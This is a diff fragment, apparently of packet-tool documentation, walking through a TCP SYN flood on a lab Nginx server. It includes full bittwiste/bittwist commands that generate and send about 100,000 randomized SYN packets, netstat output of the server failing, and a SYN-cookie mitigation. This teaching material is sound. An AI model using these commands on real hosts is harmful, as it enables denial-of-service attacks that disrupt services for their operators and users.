Download

 3. [X] Repeat the packet for 100,000 times and update the TCP header for each to contain random source port and random sequence number: $ bittwiste -I 2.pcap -O 3.pcap -N 100000 -T tcp -s rand -d 80 -q rand input file: 2.pcap output file: 3.pcap 100001 packets (9000114 bytes) written

 4. [X] Send the TCP SYN packets.
-Note that `bittwist -d` can be used to check for available network interfaces: $ sudo bittwist -i 1 -s 1514 -l 0 -r 0 3.pcap sending packets through en1 trace file: 3.pcap
+Note that `bittwist -d` can be used to check for available network interfaces: $ sudo bittwist -i 1 -s 1514 -l 0 -r 0 3.pcap sending packets through en1

 5. [Y] SSH into the Nginx web server (we should do this prior to step 4 above) and use netstat to observe the incoming TCP SYN packets.
 Notice that it won't be long before we see the timeout message as the server becomes irresponsive due to the overwhelming number of incoming TCP SYN packets being received pending processing: $ watch -n 1 'netstat -atn' Every 1.0s: netstat -atn Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 192.168.1.20:80 192.168.1.10:26128 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:53078 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:53845 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:6590 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:23915 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:1276 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:52456 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:24402 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:12122 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:30038 SYN_RECV <truncated> tcp 0 0 192.168.1.20:80 192.168.1.10:57615 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:54535 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:3437 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:30824 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:35470 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:29305 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:13177 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:49124 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:20090 SYN_RECV tcp 0 0 192.168.1.20:80 192.168.1.10:13557 SYN_RECV tcp Timeout, server 192.168.1.20 not responding.

-6. [X] Stop (CTRL+C) the send to allow the destination host to restore its services: $ sudo bittwist -i 1 -s 1514 -l 0 -r 0 3.pcap sending packets through en1 trace file: 3.pcap ^C sent = 2255091 packets, 27313662192 bits, 3414207774 bytes throughput = 32784 pps, 397.0867 Mbps, 0.3971 Gbps elapsed time = 68.785133 seconds
+6. [X] Stop (CTRL+C) the send to allow the destination host to restore its services: $ sudo bittwist -i 1 -s 1514 -l 0 -r 0 3.pcap sending packets through en1 ^C sent = 3334994 packets, 40393447328 bits, 5049180916 bytes throughput = 81409 pps, 986.0291 Mbps, 0.9860 Gbps elapsed time = 40.965775 seconds

 The example above showcases the potential impact of overwhelming a destination host with a large number of TCP connection requests.
 The attack effectively consumes server resources and renders the host and its services unresponsive.

 An effective mitigation for TCP SYN flood attack is to implement TCP SYN cookies to allow servers to handle a large number of connection requests without maintaining excessive half-open connections.
 On a Linux system, `sysctl -n net.ipv4.tcp_syncookies` should output 1 to indicate that TCP SYN cookies protection is already enabled.
-If not, you may add `net.ipv4.tcp_syncookies=1` in your /etc/sysctl.conf followed by `sysctl -p` to enable the protection.
+If not, you can add `net.ipv4.tcp_syncookies=1` in your /etc/sysctl.conf followed by `sysctl -p` to enable the protection.

 Example 4: ARP cache poisoning